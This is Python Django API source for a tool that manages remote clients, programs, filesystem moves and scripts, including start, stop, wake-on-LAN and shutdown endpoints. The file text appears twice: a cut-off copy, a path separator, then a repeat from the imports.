ensure_type("string", string, str)
return string.lower() in ('yes', 'true', '1', 't', 'y')
def slave_set(request):
"""
Process requests on a set of `SlaveModel`s.
HTTP Methods
------------
POST:
Adds a new `SlaveModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?programs=False)
If this is True, then all `SlaveModel`s are returned which have a
`ProgramModel`.
GET: query with (?filesystems=False)
If this is True, then all `SlaveModel`s are returned which have a
`FilesystemModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = SlaveForm(request.POST)
if form.is_valid():
form.save()
return StatusResponse.ok('')
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
programs = request.GET.get('programs', '')
programs = convert_str_to_bool(programs)
filesystems = request.GET.get('filesystems', '')
filesystems = convert_str_to_bool(filesystems)
if query is not None:
slaves = SlaveModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif programs or filesystems:
if programs and filesystems:
return StatusResponse(
SimultaneousQueryError('filesystems', 'programs'))
elif programs:
slaves = SlaveModel.with_programs()
elif filesystems:
slaves = SlaveModel.with_filesystems()
else:
slaves = SlaveModel.objects.all().values_list(
'name',
flat=True,
)
return StatusResponse.ok(list(slaves))
else:
return HttpResponseForbidden()
def slave_entry(request, slave_id):
"""
Process requests for a single `SlaveModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
SlaveModel.objects.get(id=slave_id).delete()
return StatusResponse.ok('')
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
elif request.method == 'PUT':
try:
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
model = SlaveModel.objects.get(id=slave_id)
form = SlaveForm(QueryDict(request.body), instance=model)
if form.is_valid():
form.save()
return StatusResponse.ok('')
else:
return StatusResponse.err(form.errors)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def slave_shutdown(request, slave_id):
"""
Processes an method invocation (shutdown) for an `SlaveModel`.(see
@frontend.controller.slave_shutdown)
HTTP Methods
------------
POST:
Invokes the method for the `SlaveModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
slave = SlaveModel.objects.get(id=slave_id)
controller.slave_shutdown(slave)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def slave_wol(request, slave_id):
"""
Processes an method invocation (wol) for an `SlaveModel`. (see
@frontend.controller.slave_wake_on_lan)
HTTP Methods
------------
POST:
Invokes the method for the `SlaveModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
slave = SlaveModel.objects.get(id=slave_id)
slave_wake_on_lan(slave)
return StatusResponse.ok('')
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def program_set(request):
"""
Process requests on a set of `ProgramModel`s.
HTTP Methods
------------
POST:
Adds a new `ProgramModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?slave=None&is_string=False)
Searches for all `ProgramModel`s which belong to the given `slave`.
Where `is_string` specifies if the given `slave` is an unique name
or and unique index.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = ProgramForm(request.POST or None)
if form.is_valid():
program = form.save(commit=False)
program.slave = form.cleaned_data['slave']
try:
program.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name':
["Program with this Name already exists on this Client."]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
slave = request.GET.get('slave', None)
slave_str = request.GET.get('is_string', False)
if query is not None:
progs = ProgramModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif slave is not None:
if slave_str:
slave_str = convert_str_to_bool(slave_str)
try:
slave = SlaveModel.from_identifier(slave, slave_str)
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave))
progs = ProgramModel.objects.filter(slave=slave).values_list(
"name",
flat=True,
)
else:
progs = ProgramModel.objects.all().values_list(
"name",
flat=True,
)
return StatusResponse.ok(list(progs))
else:
return HttpResponseForbidden()
def program_entry(request, program_id):
"""
Process requests for a single `ProgramModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
ProgramModel.objects.get(id=program_id).delete()
return StatusResponse.ok('')
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
elif request.method == 'PUT':
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
try:
model = ProgramModel.objects.get(id=program_id)
form = ProgramForm(QueryDict(request.body), instance=model)
if form.is_valid():
program = form.save(commit=False)
try:
program.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name': [
'Program with this Name already exists on this Client.'
]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_start(request, program_id):
"""
Processes an method invocation (start) for an `ProgramModel`.(see
@frontend.controller.prog_start)
HTTP Methods
------------
POST:
Invokes the method for the `ProgramModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_start(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_stop(request, program_id):
"""
Processes an method invocation (stop) for an `ProgramModel`. (see
@frontend.controller.prog_stop)
HTTP Methods
------------
POST:
Invokes the method for the `ProgramModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
try:
prog_stop(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_log_entry(request, program_id):
"""
Process requests for a single `ProgramModel`s for the log attribute.
HTTP Methods
------------
GET:
Fetches the log entry from the related `SlaveModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'GET':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_get(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_log_enable(request, program_id):
"""
Processes an method invocation (log_enable) for an `ProgramModel`. (see
@frontend.controller.prog_log_enable)
HTTP Methods
------------
POST:
Notifies the `SlaveModel` to send logs for this `ProgramModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_enable(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_log_disable(request, program_id):
"""
Processes an method invocation (log_disable) for an `ProgramModel`. (see
@frontend.controller.prog_log_disable)
HTTP Methods
------------
POST:
Notifies the `SlaveModel` to stop the sending process for logs
for this `ProgramModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_disable(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def script_set(request):
"""
Process requests on a set of `ScriptModel`s.
HTTP Methods
------------
POST:
Adds a new `ScriptModel` to the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
return script_put_post(request.body.decode('utf-8'), None)
else:
return HttpResponseForbidden()
def script_entry(request, script_id):
"""
Process requests for a single `ScriptEntry`s.
HTTP Methods
------------
GET: query (with ?slaves=int&programs=int&filesystem=int)
Returns this `ScriptModel` as a JSON encoded string where
`SlavesModel`, `ProgramModel` and `FilesystemModel` encoded as str
or int (specified by &slaves=str, &programs=str, &filesystem=str).
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'GET':
try:
# adds ?slaves=int&program_key=int&filesystem_key=int to the URL
# to allow a dynamic format for the json string
slave_key = request.GET.get('slaves', 'int')
program_key = request.GET.get('programs', 'int')
filesystem_key = request.GET.get('filesystems', 'int')
script = Script.from_model(
script_id,
slave_key,
program_key,
filesystem_key,
)
return StatusResponse.ok(dict(script))
except FsimError as err:
return StatusResponse(err)
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
elif request.method == 'PUT':
return script_put_post(request.body.decode('utf-8'), int(script_id))
elif request.method == 'DELETE':
try:
ScriptModel.objects.get(id=script_id).delete()
return StatusResponse.ok('')
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_copy(request, script_id):
"""
Processes an method invocation (copy) for an `ScriptModel`. (see
@frontend.controller.script_copy)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
script = ScriptModel.objects.get(id=script_id)
script_deep_copy(script)
return StatusResponse.ok('')
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_run(request, script_id):
"""
Processes an method invocation (run) for an `ScriptModel`. (see
@frontend.controller.script_run)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
script = ScriptModel.objects.get(id=script_id)
# only allow the start of a script if the old one is finished
script_running = ScriptModel.objects.filter(
is_running=True, is_initialized=True).exists()
if not script_running:
FSIM_CURRENT_SCHEDULER.start(script.id)
FSIM_CURRENT_SCHEDULER.notify()
return StatusResponse.ok('')
else:
return StatusResponse(ScriptRunningError(str(script.name)))
except ScriptModel.DoesNotExist as err:
return StatusResponse(ScriptNotExistError(err, script_id))
else:
return HttpResponseForbidden()
def script_stop(request):
"""
Processes an method invocation (stop) for a `ScriptModel` (see
@frontend.sheduler.stop_loop)
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel`
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
FSIM_CURRENT_SCHEDULER.stop()
FSIM_CURRENT_SCHEDULER.notify()
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
def script_set_default(request, script_id):
"""
Processes an method invocation (set_default) for a `ScriptModel`.
HTTP Methods
------------
POST:
Invokes the method for the `ScriptModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
ScriptModel.set_last_started(script_id)
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
def filesystem_set(request):
"""
Process requests on a set of `FilesystemModel`s.
HTTP Methods
------------
POST:
Adds a new `FilesystemModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?slave=None&is_string=False)
Searches for all `FilesystemModel`s which belong to the given `slave`.
Where `is_string` specifies if the given `slave` is an unique name or
and unique index.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = FilesystemForm(request.POST or None)
if form.is_valid():
filesystem = form.save(commit=False)
filesystem.slave = form.cleaned_data['slave']
try:
filesystem.full_clean()
# IMPORTANT: remove trailing path seperator (if not the query
# will not work [the query in filesystem_move])
filesystem.destination_path = up.remove_trailing_path_seperator(
filesystem.destination_path)
filesystem.source_path = up.remove_trailing_path_seperator(
filesystem.source_path)
form.save()
return StatusResponse.ok("")
except ValidationError as err:
LOGGER.warning(
"Error while adding filesystem `%s`: %s",
filesystem.name,
err,
)
string = err.message_dict['__all__'][0]
if 'Source path' in string and 'Destination path' in string and 'Slave' in string:
error_msg = 'Filesystem with this source path and destination path already exists on this Client.'
error_dict = {
'source_path': [error_msg],
'destination_path': [error_msg],
}
elif 'Name' in err.message_dict['__all__'][0] and 'Slave' in err.message_dict['__all__'][0]:
error_dict = {
'name': [
'Filesystem with this Name already exists on this Client.'
]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
slave = request.GET.get('slave', None)
slave_str = request.GET.get('is_string', False)
if query is not None:
filesystems = FilesystemModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif slave is not None:
if slave_str:
slave_str = convert_str_to_bool(slave_str)
try:
slave = SlaveModel.from_identifier(slave, slave_str)
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave))
filesystems = FilesystemModel.objects.filter(
slave=slave).values_list(
"name",
flat=True,
)
else:
filesystems = FilesystemModel.objects.all().values_list(
"name",
flat=True,
)
return StatusResponse.ok(list(filesystems))
else:
return HttpResponseForbidden()
def filesystem_move(request, filesystem_id):
"""
Processes an method invocation (move) for an `FilesystemModel`. (see
@frontend.controller.filesystem_move)
HTTP Methods
------------
POST:
Invokes the method for the `FilesystemModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_move(filesystem)
return StatusResponse(Status.ok(""))
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def filesystem_restore(request, filesystem_id):
"""
Processes an method invocation (restore) for an `FilesystemModel`. (see
@frontend.controller.filesystem_restore)
HTTP Methods
------------
POST:
Invokes the method for the `FilesystemModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_restore(filesystem)
return StatusResponse(Status.ok(""))
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def filesystem_entry(request, filesystem_id):
"""
Process requests for a single `FilesystemModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
filesystem = FilesystemModel.objects.get(id=filesystem_id)
try:
fs_delete(filesystem)
return StatusResponse.ok("")
except FsimError as err:
return StatusResponse(err)
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
elif request.method == 'PUT':
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
try:
model = FilesystemModel.objects.get(id=filesystem_id)
form = FilesystemForm(QueryDict(request.body), instance=model)
if form.is_valid():
filesystem = form.save(commit=False)
try:
filesystem.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name': [
'Filesystem with this Name already exists on this Client.'
]
}
return StatusResponse(Status.err(error_dict))
else:
return StatusResponse(Status.err(form.errors))
except FilesystemModel.DoesNotExist as err:
return StatusResponse(FilesystemNotExistError(err, filesystem_id))
else:
return HttpResponseForbidden()
def scope_operations(request):
"""
Process requests to shutdown all clients
HTTP Methods
------------
POST:
Stops all programs, resets the filesystem and shuts down every client
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
FSIM_CURRENT_SCHEDULER.stop()
FSIM_CURRENT_SCHEDULER.notify()
t = ShutdownThread(request.POST['scope'])
t.start()
return StatusResponse.ok('')
else:
return HttpResponseForbidden()
class ShutdownThread(threading.Thread):
def __init__(self, scope):
threading.Thread.__init__(self)
self.scope = scope
def run(self): # pragma: no cover
s = sched.scheduler()
programs = ProgramModel.objects.all()
programs = filter(lambda x: x.is_running, programs)
delay = 0
for program in programs:
s.enter(delay, 2, prog_stop, argument=(program, ))
delay += 1
if self.scope == 'programs':
s.run()
return
filesystems = FilesystemModel.objects.all()
filesystems = filter(lambda x: x.is_moved, filesystems)
delay += 10
for filesystem in filesystems:
s.enter(delay, 1, fs_restore, argument=(filesystem, ))
if self.scope == 'filesystem':
s.run()
return
slaves = SlaveModel.objects.all()
slaves = filter(lambda x: x.is_online, slaves)
delay += 8
for slave in slaves:
s.enter(delay, 3, controller.slave_shutdown, argument=(slave, ))
delay += 1
if self.scope == 'clients':
s.run()
return
s.run()
if platform.system() == "Windows":
subprocess.run(['shutdown', '-s', '-t', '0'])
else:
subprocess.run(['shutdown', '-h now']) | frontend/api.py | import logging
import platform
import sched, threading
import subprocess
from django.http import HttpResponseForbidden
from django.http.request import QueryDict
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from utils import Status
from utils.typecheck import ensure_type
import utils.path as up
from server.utils import StatusResponse
from .models import (
Slave as SlaveModel,
Program as ProgramModel,
Script as ScriptModel,
Filesystem as FilesystemModel,
ScriptGraphFiles as SGFModel,
ScriptGraphPrograms as SGPModel,
)
from .scripts import Script
from .forms import SlaveForm, ProgramForm, FilesystemForm
from .errors import (
FsimError,
SlaveNotExistError,
ProgramNotExistError,
FilesystemNotExistError,
SimultaneousQueryError,
ScriptRunningError,
ScriptNotExistError,
)
from frontend import controller
from .controller import (
prog_start,
prog_stop,
fs_delete,
fs_move,
fs_restore,
prog_log_disable,
prog_log_enable,
prog_log_get,
script_deep_copy,
slave_wake_on_lan,
)
LOGGER = logging.getLogger("fsim.api")
def script_put_post(data, script_id):
"""
This functions removes code duplication for `script_entry` and
`script_set`. The logic for the PUT and POST method inside these functions
are identical. For more information take a look at `script_entry` or
`script_set`
"""
try:
script = Script.from_json(data)
if script_id is None:
script.save()
else:
(new_model, _) = ScriptModel.objects.update_or_create(
id=script_id,
defaults={"name": script.name},
)
SGFModel.objects.filter(script_id=script_id).delete()
SGPModel.objects.filter(script_id=script_id).delete()
for program in script.programs:
program.save(new_model)
for filesystem in script.filesystems:
filesystem.save(new_model)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except KeyError as err:
return StatusResponse.err("Could not find required key {}".format(
err.args[0]))
except TypeError as err:
return StatusResponse.err(str(err))
except ValueError as err:
return StatusResponse.err(str(err))
except ValidationError as err:
return StatusResponse.err('; '.join(err.messages))
except IntegrityError as err:
return StatusResponse.err(str(err))
def convert_str_to_bool(string):
"""
Converts a string into a boolean by checking common patterns. If no
pattern is matching the default (False) is returned. Common string patterns
are for the boolean true are on of ('yes', 'true', '1', 't', 'y').
Parameters
----------
string: str
The string which will be converted.
Returns
-------
bool:
If one of the patterns was found in the string.
Raises
------
TypeError:
If string is not a str instance.
"""
ensure_type("string", string, str)
return string.lower() in ('yes', 'true', '1', 't', 'y')
def slave_set(request):
"""
Process requests on a set of `SlaveModel`s.
HTTP Methods
------------
POST:
Adds a new `SlaveModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?programs=False)
If this is True, then all `SlaveModel`s are returned which have a
`ProgramModel`.
GET: query with (?filesystems=False)
If this is True, then all `SlaveModel`s are returned which have a
`FilesystemModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = SlaveForm(request.POST)
if form.is_valid():
form.save()
return StatusResponse.ok('')
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
programs = request.GET.get('programs', '')
programs = convert_str_to_bool(programs)
filesystems = request.GET.get('filesystems', '')
filesystems = convert_str_to_bool(filesystems)
if query is not None:
slaves = SlaveModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif programs or filesystems:
if programs and filesystems:
return StatusResponse(
SimultaneousQueryError('filesystems', 'programs'))
elif programs:
slaves = SlaveModel.with_programs()
elif filesystems:
slaves = SlaveModel.with_filesystems()
else:
slaves = SlaveModel.objects.all().values_list(
'name',
flat=True,
)
return StatusResponse.ok(list(slaves))
else:
return HttpResponseForbidden()
def slave_entry(request, slave_id):
"""
Process requests for a single `SlaveModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
SlaveModel.objects.get(id=slave_id).delete()
return StatusResponse.ok('')
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
elif request.method == 'PUT':
try:
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
model = SlaveModel.objects.get(id=slave_id)
form = SlaveForm(QueryDict(request.body), instance=model)
if form.is_valid():
form.save()
return StatusResponse.ok('')
else:
return StatusResponse.err(form.errors)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def slave_shutdown(request, slave_id):
"""
Processes an method invocation (shutdown) for an `SlaveModel`.(see
@frontend.controller.slave_shutdown)
HTTP Methods
------------
POST:
Invokes the method for the `SlaveModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
slave = SlaveModel.objects.get(id=slave_id)
controller.slave_shutdown(slave)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def slave_wol(request, slave_id):
"""
Processes an method invocation (wol) for an `SlaveModel`. (see
@frontend.controller.slave_wake_on_lan)
HTTP Methods
------------
POST:
Invokes the method for the `SlaveModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
slave = SlaveModel.objects.get(id=slave_id)
slave_wake_on_lan(slave)
return StatusResponse.ok('')
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave_id))
else:
return HttpResponseForbidden()
def program_set(request):
"""
Process requests on a set of `ProgramModel`s.
HTTP Methods
------------
POST:
Adds a new `ProgramModel` to the database.
GET: query with (?q=None)
Searches for the name which is like ".*q.*"
GET: query with (?slave=None&is_string=False)
Searches for all `ProgramModel`s which belong to the given `slave`.
Where `is_string` specifies if the given `slave` is an unique name
or and unique index.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
form = ProgramForm(request.POST or None)
if form.is_valid():
program = form.save(commit=False)
program.slave = form.cleaned_data['slave']
try:
program.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name':
["Program with this Name already exists on this Client."]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
elif request.method == 'GET':
query = request.GET.get('q', None)
slave = request.GET.get('slave', None)
slave_str = request.GET.get('is_string', False)
if query is not None:
progs = ProgramModel.objects.filter(
name__contains=query).values_list(
"name",
flat=True,
)
elif slave is not None:
if slave_str:
slave_str = convert_str_to_bool(slave_str)
try:
slave = SlaveModel.from_identifier(slave, slave_str)
except FsimError as err:
return StatusResponse(err)
except SlaveModel.DoesNotExist as err:
return StatusResponse(SlaveNotExistError(err, slave))
progs = ProgramModel.objects.filter(slave=slave).values_list(
"name",
flat=True,
)
else:
progs = ProgramModel.objects.all().values_list(
"name",
flat=True,
)
return StatusResponse.ok(list(progs))
else:
return HttpResponseForbidden()
def program_entry(request, program_id):
"""
Process requests for a single `ProgramModel`s.
HTTP Methods
------------
DELETE:
Removes the specified entry (in the URL) from the database.
PUT:
Updates the specified entry (in the URL) in the database.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'DELETE':
try:
ProgramModel.objects.get(id=program_id).delete()
return StatusResponse.ok('')
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
elif request.method == 'PUT':
# create form from a new QueryDict made from the request body
# (request.PUT is unsupported) as an update (instance) of the
# existing slave
try:
model = ProgramModel.objects.get(id=program_id)
form = ProgramForm(QueryDict(request.body), instance=model)
if form.is_valid():
program = form.save(commit=False)
try:
program.full_clean()
form.save()
return StatusResponse.ok('')
except ValidationError as _:
error_dict = {
'name': [
'Program with this Name already exists on this Client.'
]
}
return StatusResponse.err(error_dict)
else:
return StatusResponse.err(form.errors)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_start(request, program_id):
"""
Processes an method invocation (start) for an `ProgramModel`.(see
@frontend.controller.prog_start)
HTTP Methods
------------
POST:
Invokes the method for the `ProgramModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
prog_start(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_stop(request, program_id):
"""
Processes an method invocation (stop) for an `ProgramModel`. (see
@frontend.controller.prog_stop)
HTTP Methods
------------
POST:
Invokes the method for the `ProgramModel` (which is
specified in the URL).
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'POST':
try:
program = ProgramModel.objects.get(id=program_id)
try:
prog_stop(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
return HttpResponseForbidden()
def program_log_entry(request, program_id):
"""
Process requests for a single `ProgramModel`s for the log attribute.
HTTP Methods
------------
GET:
Fetches the log entry from the related `SlaveModel`.
Parameters
----------
request: HttpRequest
The request which should be processed.
Returns
-------
HttpResponse:
If the HTTP method is not supported, then an
`HttpResponseForbidden` is returned.
"""
if request.method == 'GET':
try:
program = ProgramModel.objects.get(id=program_id)
prog_log_get(program)
return StatusResponse.ok('')
except FsimError as err:
return StatusResponse(err)
except ProgramModel.DoesNotExist as err:
return StatusResponse(ProgramNotExistError(err, program_id))
else:
